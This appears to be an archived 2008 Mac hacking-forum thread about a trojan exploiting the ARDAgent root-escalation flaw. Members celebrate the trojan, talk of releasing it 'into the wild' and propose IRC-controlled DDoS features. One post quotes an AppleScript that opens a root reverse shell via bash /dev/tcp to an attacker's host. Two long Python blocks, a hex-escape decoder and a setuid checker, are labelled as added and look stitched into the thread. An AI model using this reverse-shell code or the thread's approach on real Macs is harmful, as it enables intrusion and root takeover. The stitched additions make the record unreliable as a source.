Full Version: remote login Trojan
TSF - Mac Security Forums > Discussion > Programming
callmenames
Ummhm, true, and this is not a remote vulnerability. However, the vulnerability -can- be exploited remotely.
callmenames
QUOTE (Skratz0r @ Jun 25 2008, 06:56 AM) *
The problem would be finding where to host it, though.

~ Skrat

Um, gee Skrat, your example is posted right here. :)
Skratz0r
Say what?
Siph0n
QUOTE (Nilkimas @ Jun 25 2008, 03:20 AM) *
You forgot there is already an obj.C version of the vir, but no spotlight integration... :-P

Here is the last version, which is kind of improved: it is intelligent and reinfects the system only after a certain amount of time, so it doesn't waste too many system resources and is more silent.
It also infects all volumes (like FTP- or AFP-mounted volumes) on the system. Also different is that the infection method starts only after an infected application has quit, so there won't be any noticeable slow-down at the launch of an app.
Now the infection method could also be put into an additional thread, so it could run even more smoothly, but this is not implemented in this version, although it can be done quite quickly using NSThread.

There might be a need to clean that stuff up a bit, but it works, as far as I remember from 5 months ago... All the NSLogs were for debugging; you are free to remove them and the comments... Must be compiled as a command-line utility, using the Foundation framework. (Maybe you need to add the AppKit framework too, not sure though.)

CODE
...


I did forget about it! <3 your improvements man. You put a good amount of effort into it :)
callmenames
QUOTE
As you may have read, this flaw is not capable of being exploited remotely

Izzat so?

Yeah, I guess I could've explained myself a bit better there - some sites have posted that it isn't possible for the ARDAgent exploit to be used with a remote ssh session. It is.
See: The previous page of this thread... http://www.macshadows.com/forums/index.php...ost&p=65879
callmenames
Robert Vamosi = on crack?
http://news.cnet.com/8301-10789_3-9976122-...tml?tag=sc.blog

Excerpt
QUOTE
Last Thursday, Mac antivirus vendors Intego and SecureMac reported a serious vulnerability within the Apple Remote Desktop Agent (ARDAgent). It is part of the remote-management component of Mac OS X 10.4 and 10.5 and is owned by root. Thus, the ARDAgent executable runs this malicious code as root without requiring a password.

The Washington Post's Brian Krebs reported on Monday the presence of a hacker forum devoted to the development of Trojans around this vulnerability. The particular user forum at MacShadows.com has since been removed. Krebs nonetheless managed to obtain screenshots from the forum before it was erased, and also a copy of the Mac Trojan template.

Buried within the template was an e-mail from one of the Trojan's authors, "Andrew."

"Apple tells us that OS X is safe and secure and fails to actually confirm that it is so on their own. We are left to experiment and test our own security and too often we discover that we aren't actually as secure as we were led to believe," Andrew said in an e-mail to the Post.

Doh, I misread that; I thought he was stating that the email from Andrew to the Washington Post was embedded in the template. Never mind.
Spratt_
For Visitors:
The following links to our knowledge base contain further information on this subject, including Solutions, Discovery, Templates, and more:
ARDAgent exploit & Com.apple.SystemLoginItems.plist Exploit
andrewistheshit
Hehe I'm famous for doing like nothing
Skratz0r
Lol. So it seems...
torsan
I can finally get back on the forums yay! but, 61 pages in this post?!?!?!?!111/?!/111
callmenames
QUOTE (andrewistheshit @ Jun 25 2008, 09:40 PM) *
Hehe I'm famous for doing like nothing

None of us are living in a vacuum Andrew. You ask questions, others read them and think, conversation ensues, soon Rome is burned to the ground. :) This thread is a perfect example... one simple post by Lokin and suddenly the Sky is Falling, the Sky is Falling!!!!
andrewistheshit
And don't forget to let it into the wild for maximum effect. ;]

So I looked around really quick and I'm trying to figure out the hex code thing, like this out of the template.

CODE
set key1 to do shell script "echo -e \"\\x5b\\x6e\\x2d\\x7a\\x69\\x2d\\x6d\\x61\\x2d\\x68\\x5d\\x38\\x36\\x37\\x35\\x33\\x30\\x39\\x2d\\x34\\x20\\x32\\x31\""
set key2 to do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""

Is that not called hex coding?

Or is it hex? I'm just confused how to use it and what its advantage is, besides hiding things like my email :]
callmenames
Hey Andrew, how's the fame going? :)

At times it is difficult to include certain characters. For instance, a space is a character which can cause problems on the command line. 'ls /Applications/Address Book.app' would attempt to list files in the folder /Applications/Address and also in the folder Book.app, because the space is typically the field separator for different parts of a command line, not just a character considered to be included in a specific part. I don't think I said that well at all, but enh, moving on. To address that issue, the space can be quoted; for instance, 'ls "/Applications/Address Book.app"' would work, since the double-quotes are used to indicate the beginning and end of the filepath part of the command line. However, space isn't the only problematic character. Others include tab and return, and how about if the filename itself contains a double-quote? See the problem?

To overcome that, 'escaping' is used. In this example, the space in the filepath is escaped by the backslash character: /Applications/Address\ Book.app. This allows a space to be included without actually being treated as a space. Instead, it's treated as a 'normal' character and not a possible field separator.

Another problem is that some characters may not necessarily be visible, or easily entered from a keyboard. A way to include such a character without causing other problems is to use the numerical value which represents the character, instead of the character itself.

"A" is generally how your computer would display the character whose value is 65. In AppleScript try "display dialog (ASCII character 65)". 65 is the value in decimal or base 10. Base 10 is 'native' for humans but not computers. Computers, having only 2 fingers, prefer to count in base 2 and multiples thereof. Base 2 is not exactly 'user-friendly' to the human attempting to issue commands to the computer. A "happy medium" of base 16 is commonly used instead. In base 16, the value 65 (being six 10s and five 1s) is expressed as 41 (four 16s and one 1). So the hexadecimal or hex value of A is 41.

But if you merely type 'echo 41' on the command line, it will return "41" not A. Escaping can be used to tell the computer that the 41 is actually the hex value of the character we want it to display instead. In Terminal, type...
CODE
echo -e "\x41"


And now we get the output we wanted, "A". Type 'help echo' for a somewhat incomplete explanation of the -e switch as applies to the bash built-in command "echo".

In the AppleScript examples you posted, we see a method of getting around yet another problem, which is that the escape character backslash is also used in AppleScript, for instance like this: 'display dialog "\x41"', which displays "x41". So when trying to pass the backslash from an AppleScript command to a shell command, it fails, because AppleScript assumes that by \x we mean the escaped character "x", so it would pass "x41" to bash instead of "\x41". To pass the backslash from an AppleScript command to a shell command, the escape character must be escaped with the escape character.

As you can see, forethought is not always a primary ingredient in designing computer languages. :)

Here's one of the commands you posted, and the output returned when the command is run in Script Editor.
CODE
set key2 to do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""

"[a-hi-mn-z]0123456789 -"
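The three layers callmenames walks through above can be peeled mechanically. What follows is an added example and not code from the thread: a small Python decoder that undoes the AppleScript string literal, then the bash double quotes, then the bash builtin `echo -e`, and the reverse operation that builds such a line from plain text. The two sample lines are the ones Andrew posted; the function names are my own and nothing here is part of the template.

```python
"""Peel the escaping layers of an AppleScript `do shell script "echo -e ..."` line."""
import re

# Constructed samples: the two lines quoted from the template, as raw strings.
KEY1_LINE = r'set key1 to do shell script "echo -e \"\\x5b\\x6e\\x2d\\x7a\\x69\\x2d\\x6d\\x61\\x2d\\x68\\x5d\\x38\\x36\\x37\\x35\\x33\\x30\\x39\\x2d\\x34\\x20\\x32\\x31\""'
KEY2_LINE = r'set key2 to do shell script "echo -e \"\\x5b\\x61\\x2d\\x68\\x69\\x2d\\x6d\\x6e\\x2d\\x7a\\x5d\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x20\\x2d\""'

_AS_ESCAPES = {"n": "\n", "r": "\r", "t": "\t"}


def applescript_unescape(literal):
    # Layer 1: the text between AppleScript's quotes.  AppleScript knows \\ and \"
    # (plus \n, \r, \t); any other backslash is dropped, which is why
    # display dialog "\x41" shows x41 rather than A.
    out, i = [], 0
    while i < len(literal):
        ch = literal[i]
        if ch == "\\" and i + 1 < len(literal):
            nxt = literal[i + 1]
            out.append(_AS_ESCAPES.get(nxt, nxt))
            i += 2
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def bash_dquote_unescape(s):
    # Layer 2: inside bash double quotes only \\ \" \$ \` and \<newline> are special.
    # "\x" is not, so it survives untouched to echo.
    out, i = [], 0
    while i < len(s):
        ch = s[i]
        if ch == "\\" and i + 1 < len(s):
            nxt = s[i + 1]
            if nxt in '\\"$`':
                out.append(nxt)
                i += 2
                continue
            if nxt == "\n":
                i += 2
                continue
        out.append(ch)
        i += 1
    return "".join(out)


_ECHO_SIMPLE = {"\\": "\\", "a": "\a", "b": "\b", "e": "\x1b", "f": "\f",
                "n": "\n", "r": "\r", "t": "\t", "v": "\v"}


def echo_e(s):
    # Layer 3: bash's builtin `echo -e`.  \xHH (1-2 hex digits) and \0NNN (octal)
    # become a byte, which is shown here as a Latin-1 code point; \c is not handled.
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s):
            nxt = s[i + 1]
            if nxt == "x":
                m = re.match(r"[0-9A-Fa-f]{1,2}", s[i + 2:])
                if m:
                    out.append(chr(int(m.group(), 16)))
                    i += 2 + m.end()
                    continue
            elif nxt == "0":
                m = re.match(r"[0-7]{0,3}", s[i + 2:])
                out.append(chr(int(m.group() or "0", 8)))
                i += 2 + m.end()
                continue
            elif nxt in _ECHO_SIMPLE:
                out.append(_ECHO_SIMPLE[nxt])
                i += 2
                continue
        out.append(s[i])
        i += 1
    return "".join(out)


_DO_SHELL = re.compile(r'do shell script "(.*)"\s*$')
_ECHO_CMD = re.compile(r'echo\s+(?:-[a-zA-Z]+\s+)*"(.*)"\s*$')


def decode_layers(line):
    # Return every intermediate form so each layer can be inspected on its own.
    m = _DO_SHELL.search(line)
    if not m:
        raise ValueError("not a do shell script line: %r" % line)
    as_literal = m.group(1)
    shell_cmd = applescript_unescape(as_literal)
    e = _ECHO_CMD.fullmatch(shell_cmd.strip())
    if not e:
        raise ValueError('shell command is not echo "...": %r' % shell_cmd)
    echo_arg = bash_dquote_unescape(e.group(1))
    return {"applescript_literal": as_literal, "shell_command": shell_cmd,
            "echo_argument": echo_arg, "output": echo_e(echo_arg)}


def decode_do_shell_script(line):
    return decode_layers(line)["output"]


def encode_for_applescript(name, text):
    # Reverse direction (ASCII only): every character as \xHH for echo -e, each
    # backslash doubled to survive the AppleScript literal, inner quotes as \".
    hexed = "".join(r"\\x%02x" % ord(c) for c in text)
    return 'set %s to do shell script "echo -e \\"%s\\""' % (name, hexed)


if __name__ == "__main__":
    for line in (KEY1_LINE, KEY2_LINE):
        for layer, value in decode_layers(line).items():
            print("%-20s %s" % (layer, value))
        print()
```

Running it prints the same two strings Script Editor returned above; `encode_for_applescript("key1", "[n-zi-ma-h]8675309-4 21")` reproduces the key1 line byte for byte, which is a quick way to confirm you have the doubling right before pasting a line into a script.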
andrewistheshit
Being grounded, I'm going to have to read the rest later, but the fame isn't that cool. I'm grounded, for one. Secondly, I didn't really write it, so I don't really feel that good, so I have taken it upon myself to try to learn this stuff to the best of my ability right now.
callmenames
Yeah the grounded part sounds lame and I suppose any recognition of fame would be limited to a rather small percentage of the populace. That last part sounds very good though. :)
andrewistheshit
Yeah, about nobody I know thinks that it was cool. They're all like, "nice, so?"
Yeah, I'm kinda pissed that I still won't have it for like a week. :(
Skratz0r
QUOTE (Wawl @ Jun 16 2008, 10:25 AM) *
... Or simply
CODE
repeat 10 times
    try
        tell application "ARDAgent" to do shell script "bash -i >& /dev/tcp/" & masters_DDNS & "/" & masters_netcat_port & " 0>&1"
    end try
end repeat
...


Strange. Is this /dev/tcp only under Leopard? I don't seem to have one.
What can be done for non-leopard users in that/this situation?

~ Skrat
callmenames
It doesn't *actually* exist; it's all smoke and mirrors by bash. :) It will work in 10.4 too. Try it.

http://www.gnu.org/software/bash/manual/bashref.html
QUOTE
Bash handles several filenames specially when they are used in redirections, as described in the following table:

/dev/fd/fd
If fd is a valid integer, file descriptor fd is duplicated.
/dev/stdin
File descriptor 0 is duplicated.
/dev/stdout
File descriptor 1 is duplicated.
/dev/stderr
File descriptor 2 is duplicated.
/dev/tcp/host/port
If host is a valid hostname or Internet address, and port is an integer port number or service name, Bash attempts to open a TCP connection to the corresponding socket.
/dev/udp/host/port
If host is a valid hostname or Internet address, and port is an integer port number or service name, Bash attempts to open a UDP connection to the corresponding socket.


Skratz0r
$ /dev/tcp http://www.google.com 80
-bash: /dev/tcp: No such file or directory

$ /dev/tcp 74.52.40.242 80
-bash: /dev/tcp: No such file or directory

---------
Edit
---------

Ok, figured out how to do it now... :-P

echo "GET / HTTP/1.1" > /dev/tcp/google.com/80

~ Skrat
stefanovich
QUOTE (andrewistheshit @ Jun 27 2008, 12:50 AM) *
Being grounded, I'm going to have to read the rest later, but the fame isn't that cool. I'm grounded, for one. Secondly, I didn't really write it, so I don't really feel that good, so I have taken it upon myself to try to learn this stuff to the best of my ability right now.


Don't worry about it :P You were, as callmenames mentioned, instrumental in provoking the conversation and asking the right questions without which the trojan may never have been developed.

You had some good ideas and input, and while not solely responsible, you definitely deserve at least some credit (but perhaps not all of it! :) )

Stay in school kids..
Skratz0r
Hah.
You two-faced so and so...

QUOTE
[11:26:04] <stef_work> alcohol and drugs are great for teh kids
[11:26:20] <stef_work> i encourage all children to get high while they can


~_~

~ Skrat
stefanovich
QUOTE
[11:30:15] <Skrat> I dress in women's clothing sometimes
[11:31:10] <Skrat> it makes me feel warm inside
Skratz0r
Yes, yes it does.

~ Skrat
Oktane
Name: OSX.Trojan.PokerStealer?? My Macbook as the trojan (Video)
Link: http://www.youtube.com/watch?v=h16u9cU0YcA

Description: I was working in Keynote and my Mac just went black and started emitting a very loud noise. I ran away from it because it sounded like it was going to blow up, then I got my camera and filmed the rest!!!!!

I'm sure that this person is slightly retarded, warning this is extremely boring, pointless and stupid. Nothing happens throughout so don't bother watching the whole thing.
Skratz0r
QUOTE
this is extremely boring, pointless and stupid.

I concur. But why did you post it? xD

Indeed, it's weird someone already posted a video with the supposed name in the title, but meh.
False alarm...

Who fucking called it OSX.Trojan.PokerStealer? What a shitty name.
Stupid security companies.

~ Skrat
callmenames
That would be Intego. They protect your world. lol

http://www.intego.com/news/ism0803.asp

I named the file PokerGame and slapped a hideous icon on it as an example. Apparently name+icon not indicating intended purpose of program, now = trojan. By that definition, Firefox qualifies. It seems clear from the icon and the name that running Firefox will unleash a burning fox upon the world. In reality, all it does is open a browser which introduces a slew of security concerns on your system. Stupid trojans. And for the slow witted, yes I'm kidding. Almost all the time.
Fixer
That ARD script is an awesome piece of work.
Fixer
QUOTE (callmenames @ Jun 27 2008, 07:49 PM) *
That would be Intego. They protect your world. lol

They really do write this. What hubris!
Fixer
QUOTE (Skratz0r @ Jun 27 2008, 10:55 AM) *
Hah.
You two-faced so and so...

Kids! Don't buy drugs! Join a rock band and let your manager buy them for you!
- Billy Mack
callmenames
QUOTE (Fixer @ Jun 29 2008, 01:56 AM) *
That ARD script is an awesome piece of work.


Which one? There are two variations of multi-featured (long) Trojan and various shorter scripts too. Oktane went the Xcode route with a perfect authentication dialog window as a backup in case the exploit was unsuccessful; I stayed in Script Editor, trying to keep it as easy as possible for the largest number of people to play with. It's probably safe to speak for all of us and just say Thanks. :) I happen to know that even now there are variants being crafted with fresh ideas, and also similar but wholly unrelated projects whose only similarity is in taking advantage of the vulnerability. I think the media attention may have made some people shy of posting their ideas, which is a shame, because it was awesome to see everyone jumping in for a while there, but on the other hand maybe it's time for a different topic in a new thread. Care to start one? :)
Skratz0r
QUOTE (callmenames @ Jun 29 2008, 10:27 AM) *
Which one? There are two variations of multi-featured (long) Trojan and various shorter scripts too. Oktane went the Xcode route with a perfect authentication dialog window as a backup in case the exploit was unsuccessful; I stayed in Script Editor, trying to keep it as easy as possible for the largest number of people skiddies to play with. It's probably safe to speak for all of us and just say Thanks. :) I happen to know that even now there are variants being crafted with fresh ideas, and also similar but wholly unrelated projects whose only similarity is in taking advantage of the vulnerability. I think the media attention may has have made some people shy of posting their ideas, which is a shame, because it was awesome to see everyone jumping in for a while there, but on the other hand maybe it's time for a different topic in a new thread. Care to start one? :)


Fixed. :-P
~ Skrat
callmenames
Personally I think that both of the Mac script kiddies that are out there need all the help they can get to keep up with their Windows counterparts. Many of these http://www.macshadows.com/downloads.html don't include any source at all. At the very least perhaps someone will get some exposure from this, to something more than a compiled program. Hopefully the use of high-level languages like AppleScript will have one or the other of the script kiddies (possibly both but I'm not asking for miracles here) deciding to fiddle about in the code in an effort to correct my mistakes or more fully implement ideas at which I only hinted...



Skratz0r
Hmm. Perhaps.
But if they're gonna learn to code; PLEASE don't teach them AppleScript. Heh...

C for the win.

~ Skrat
callmenames
Sure, but everything needed to use AppleScript is already included on every Mac. It's widely accessible. Anyone using OS X can double-click Script Editor and get instant positive feedback in that it runs... whereas when the average user opens Terminal and types gcc <something>...
CODE
-bash: gcc: command not found
Siph0n
QUOTE (callmenames @ Jun 30 2008, 01:37 PM) *
Sure, but everything needed to use AppleScript is already included on every Mac. It's widely accessible. Anyone using OS X can double-click Script Editor and get instant positive feedback in that it runs... whereas when the average user opens Terminal and types gcc <something>...
CODE
-bash: gcc: command not found


Same reason I used Python and Perl for my stuff. It's included by default. But C might be fun to do something in...
callmenames
Perhaps a poll next time on which language the members would prefer for the trojan examples. :)

http://blogs.techrepublic.com.com/security/?p=486
QUOTE
Trojans targeting Mac OS X ARDAgent flaw surfaces
It doesn’t take rocket science to know that Andrew is deeply unhappy with Apple’s policy not to talk on topics relating to security vulnerabilities.


And I'd bet a dollar Andrew ain't the only one... :)
Oktane
QUOTE
Apple released Mac OS X 10.5.4 today, a bug-fix update that touches on several areas. Recent security updates are included (though the recent ARDAgent vulnerability has not yet been addressed[)]


Source: http://db.tidbits.com/article/9679
callmenames
Oh dear me, I just can't stop laughing although I also want to cry. I think I'll switch to Ubuntu now.

Local denial-of-service for the whole damn console/GUI! WITHOUT A SINGLE LINE OF CODE!!!!!!

http://www.macshadows.com/forums/index.php?showtopic=8794
callmenames
'callmenames' is upgrading to Leopard for the moment, and shall return in a few months although with a different name due to being shy. :)

Its been fun, see you all again soon!

:)

Johnny.0v3rki11
QUOTE (callmenames @ Jun 30 2008, 03:39 PM) *
Perhaps a poll next time on which language the members would prefer for the trojan examples. :)

http://blogs.techrepublic.com.com/security/?p=486


And I'd bet a dollar Andrew ain't the only one... :)


perl - quick and easy
Johnny.0v3rki11
nm
stefanovich
I second that!!
andrewistheshit
aww they fixed it :(
Andrew#002
It still returns root here on 10.5.4, so I don't think it's fixed yet.

I also noticed that the kickstart thing mentioned in this thread does require sudo in 10.5.4.
CODE
bash-3.2$ /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart must be run as root or sudo (501).


I tried getting SecurityAgent to do stuff without much luck, but I noticed that it creates files with group wheel instead of its own group, which seems very wrong. Its parent process is securityd, which does have group wheel, so somehow it's inheriting that, I guess.
CODE
tell application "SecurityAgent" to do shell script "touch /Users/Shared/foo; ls -l /Users/Shared/foo; id"
"-rw-r--r--  1 _securityagent  wheel  0 Jul  3 11:01 /Users/Shared/foo
uid=92(_securityagent) gid=92(_securityagent) groups=92(_securityagent)"

CODE
bash-3.2# dscl . -read /Groups/wheel
AppleMetaNodeLocation: /Local/Default
GeneratedUID: ABCDEFAB-CDEF-ABCD-EFAB-CDEF00000000
GroupMembership: root
Password: *
PrimaryGroupID: 0
RealName:
System Group
RecordName: wheel
RecordType: dsRecTypeStandard:Groups
SMBSID: S-1-5-21-100

bash-3.2# ps -Aj | grep Sec
root      4156    22    22 2a78fd8    0 S      ??    0:00.09 /System/Library/CoreServices/SecurityAgent.app/Contents/Resources/authorizationhost
_securityagent  4172    22    22 2a78fd8    0 S      ??    0:02.75 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent

Andrew#002
QUOTE (Andrew#002 @ Jul 3 2008, 11:02 AM) *
I tried getting SecurityAgent to do stuff without much luck but I noticed that it creates files with group wheel

Nevermind, /Users/Shared has its sticky-bit set.
synack
Interesting, I like how active this thread is. Has anybody considered implementing an IRC connector to accept remote commands, making this a DDoS-capable trojan? What fun are trojans unless you can take advantage of numbers and distributed resources? =)
andrewistheshit
Can anyone still get root with ARD in the newest version of Leopard?
Andrew#002
Yes, it still works in 10.5.4
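Since the thread keeps asking whether the trick still works on a given release, here is an added check (mine, not from the thread or from Apple) of the one precondition it depends on: the ARDAgent executable being a setuid-root binary, which is what lets a "do shell script" sent to it run as root. The binary path assumes the standard bundle layout of the ARDAgent.app the thread names, and `strip_setuid` applies the chmod u-s workaround that circulated before Apple shipped a fix. A clean result here only says the setuid precondition is gone, nothing more.

```python
"""Report whether a binary carries the setuid-root bit the ARDAgent trick needs."""
import os
import stat
import tempfile
from dataclasses import dataclass
from typing import List, Optional

# Executable inside the app bundle named in the thread (standard bundle layout
# assumed; it is only inspected if it exists on this host).
ARDAGENT = ("/System/Library/CoreServices/RemoteManagement/"
            "ARDAgent.app/Contents/MacOS/ARDAgent")


@dataclass
class SuidReport:
    path: str
    exists: bool
    owner_uid: Optional[int]
    setuid: bool
    setgid: bool

    @property
    def setuid_root(self) -> bool:
        # Both halves are needed: owned by uid 0 *and* the setuid bit set.
        return self.exists and self.setuid and self.owner_uid == 0


def inspect_suid(path: str) -> SuidReport:
    try:
        st = os.stat(path)
    except (FileNotFoundError, NotADirectoryError):
        return SuidReport(path, False, None, False, False)
    mode = st.st_mode
    return SuidReport(path, True, st.st_uid,
                      bool(mode & stat.S_ISUID), bool(mode & stat.S_ISGID))


def strip_setuid(path: str) -> SuidReport:
    # Equivalent of `chmod u-s path`; needs ownership of the file or root.
    st = os.stat(path)
    os.chmod(path, stat.S_IMODE(st.st_mode) & ~stat.S_ISUID)
    return inspect_suid(path)


def scan_setuid_root(root: str) -> List[str]:
    # Equivalent of `find root -type f -perm -4000 -user root`, symlinks not followed.
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.lstat(p)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID and st.st_uid == 0:
                found.append(p)
    return sorted(found)


def demo(tmp_root: Optional[str] = None) -> dict:
    # Self-contained walkthrough on a throwaway file (constructed, not ARDAgent):
    # set the bit, inspect, scan the tree, strip the bit, inspect again.
    root = tempfile.mkdtemp(dir=tmp_root)
    path = os.path.join(root, "demo-binary")
    with open(path, "wb") as f:
        f.write(b"#!/bin/sh\n")
    os.chmod(path, 0o4755)
    before = inspect_suid(path)
    found = scan_setuid_root(root)
    after = strip_setuid(path)
    os.unlink(path)
    os.rmdir(root)
    return {"before": before, "found": found, "after": after,
            "uid": os.getuid(), "path": path}


if __name__ == "__main__":
    r = inspect_suid(ARDAGENT)
    if not r.exists:
        print("%s: not present on this host" % ARDAGENT)
    else:
        print("%s: owner uid %d, setuid=%s -> %s" % (
            r.path, r.owner_uid, r.setuid,
            "EXPOSED (setuid root)" if r.setuid_root else "not setuid root"))
    print("demo:", demo())
```

Run as a normal user the demo file is setuid but not root-owned, so `setuid_root` stays False and the scan returns nothing; run as root the same file shows up in the scan, which is the shape of result you want for the real ARDAgent path.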
synack
Xirc is an Internet Relay Chat (IRC) application only for Mac OS X, written in pure Objective-C using the Cocoa frameworks. Xirc is fully integrated with the Mac OS X technologies, such as sheets, drag & drop, Address Book, etc.

It is fully scriptable using the flexible and powerful C-like internal language or the AppleScript language. It supports plugins to extend the scripting capabilities or create applications through the IRC engine.

Xirc implements DCC Send, Chat and TurboDCC, SSL connections (SSLv2 and SSLv3) with certificate and private key, connections through a proxy server (HTTP, SOCKS v4, SOCKS v4a, SOCKS v5) and many other features.

Limitations:
30-day trial.


Damn 30-day trial. Does anybody know of something similar that's free?
stefanovich
Why the hell did you post that here? XChat is good if you want an IRC client for OSX that's free..